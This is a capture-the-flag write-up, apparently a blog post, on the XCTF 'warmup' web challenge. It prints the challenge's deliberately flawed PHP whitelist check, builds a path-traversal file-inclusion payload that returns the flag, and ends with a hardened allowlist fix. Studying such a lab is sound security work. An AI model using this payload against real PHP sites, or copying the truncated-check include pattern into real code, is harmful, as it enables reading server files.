Advanced area of attack and defense world web masters warmup
2022-07-29 00:17:00 【Ant200】
View the page source and find a reference to source.php.

Open source.php to get the source code.

Code audit and analysis:
<?php
highlight_file(__FILE__); // Display this file's source with syntax highlighting
class emmm // Define a class
{
    public static function checkFile(&$page) // Check function
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; // Define a whitelist
        if (! isset($page) || !is_string($page)) { // Reject if the variable is unset or not a string; passing a string gets past this
            echo "you can't see it"; // Print "you can't see it"
            return false; // Return false
        }
        if (in_array($page, $whitelist)) { // If $page is in $whitelist, the check passes
            return true; // Return true
        }
        $_page = mb_substr( // Take a substring
            $page,
            0,
            mb_strpos($page . '?', '?') // Keep the part of $page before the first '?'
        );
        if (in_array($_page, $whitelist)) { // If that part is in $whitelist, return true: as long as the text before '?' is source.php or hint.php, the check passes
            return true;
        }
        $_page = urldecode($page); // URL-decode
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?') // Keep the part of the decoded value before the first '?'
        );
        if (in_array($_page, $whitelist)) { // Same as above: the check passes
            return true;
        }
        echo "you can't see it";
        return false;
    }
}
if (! empty($_REQUEST['file']) // The input is not empty
    && is_string($_REQUEST['file']) // The input is a string
    && emmm::checkFile($_REQUEST['file']) // Run the check function
) {
    include $_REQUEST['file']; // Include the file named by the full, untruncated input
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; // Otherwise print an image
}
?>

Find the hint.php file; visiting it tells us the location of the flag.
Clearly we want the include to load the file containing the flag, so the request has to satisfy the final if:

if (! empty($_REQUEST['file']) // The input is not empty
    && is_string($_REQUEST['file']) // The input is a string
    && emmm::checkFile($_REQUEST['file']) // Run the check function

The first two conditions are easy to satisfy: just pass a string. That leaves the last condition, the check function; the ways to get past it are written in the code comments above.
Here we only know the file name, not the path, so look it up.
Enough ../ segments will reach it. Usually five or six are written; if that does not find it, try another count.
Construct the payload: ?file=source.php?/../../../../../../ffffllllaaaagggg

http://xxx.xxx.xxx/source.php?file=source.php?/../../../../../../ffffllllaaaagggg

Note that the first question mark is the one that passes the parameter. The payload can also be written like this (source.php can also be changed to hint.php):

http://xxx.xxx.xxx/?file=source.php?/../../../../../../ffffllllaaaagggg

Submitting it returns the flag: flag{25e7bce6005c4e0c983fb97297ac6e5a}
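
The root cause, and a form of the include that does not have it, as an added example (not the challenge's code): the check validates a truncated copy of the input while include receives the whole string. ALLOWED_PAGES, weakCheck() and resolvePage() are hypothetical names, and the temp directory with its two stand-in files is constructed for the demo.

```php
<?php
// Added example, not the challenge's code. ALLOWED_PAGES, weakCheck() and
// resolvePage() are hypothetical names; the file names are the page's whitelist.
const ALLOWED_PAGES = ['source' => 'source.php', 'hint' => 'hint.php'];

// The page's check reduced to its second branch: it validates only the text
// before the first '?', while include later receives the whole string.
function weakCheck(string $page): bool
{
    $prefix = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    return in_array($prefix, ALLOWED_PAGES, true);
}

// Hardened form: the request value is only a lookup key. The path handed to
// include is built from the allowlist, so no request bytes end up in it.
function resolvePage(string $requested, string $baseDir): ?string
{
    $name = array_search($requested, ALLOWED_PAGES, true); // accept "source.php"
    $key  = $name !== false ? $name : $requested;           // or the key "source"
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        return null;
    }
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$key]);
    $base = realpath($baseDir);
    // Defense in depth: the resolved file must exist inside the base directory.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temp directory holding two empty stand-in files.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'warmup_demo';
@mkdir($base);
file_put_contents($base . '/source.php', '');
file_put_contents($base . '/hint.php', '');

// The last input is the payload shown on this page.
$inputs = ['source.php', 'hint.php', 'source.php?/../../../../../../ffffllllaaaagggg'];
foreach ($inputs as $in) {
    printf("%-50s weak=%s hardened=%s\n", $in,
        var_export(weakCheck($in), true),
        var_export(resolvePage($in, $base) !== null, true));
}
```

In the application the call site becomes an include of the value returned by resolvePage(), never of $_REQUEST['file'] itself.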
Reference: [XCTF Master advanced area] web7_warmup writeup (1), Mitch311's blog, CSDN
